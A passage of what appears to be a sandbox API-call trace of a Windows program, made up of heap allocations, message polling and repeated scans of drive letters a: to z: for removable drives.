hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0221.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0221.792] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.792] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.792] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.793] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.793] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.793] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.793] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.793] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.794] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.794] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.794] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.794] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.794] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.795] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.795] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.795] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.796] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.796] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.796] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.796] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.797] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.797] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.797] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.797] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.798] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.798] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.798] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0221.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0221.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0221.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0221.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0221.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.934] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0221.934] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0221.934] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0221.935] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.935] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0221.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0221.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0221.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0221.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0221.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0221.935] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0221.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.936] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0221.936] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0221.936] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0221.936] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0221.936] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0221.936] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.937] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0221.937] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.937] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.937] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.937] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.937] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.937] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.938] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.938] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.938] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.938] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.938] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.939] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.939] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.939] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.939] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.939] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.939] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.940] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.940] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.940] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.940] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.940] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.941] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.941] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.941] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.941] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.942] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.942] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0221.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0221.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0221.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.942] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0221.943] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0221.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0221.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0221.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.943] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0221.943] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0221.943] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.944] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.944] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0221.944] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.944] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.945] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0221.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.945] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.945] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.946] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.946] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.946] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.946] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.946] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.946] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.947] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.947] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.947] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.947] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.947] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.948] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.948] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.948] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.948] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.948] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.949] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.949] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.949] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.949] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.949] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.950] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.950] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.950] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.950] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.951] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0221.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0221.952] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0221.952] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.953] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0221.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.953] 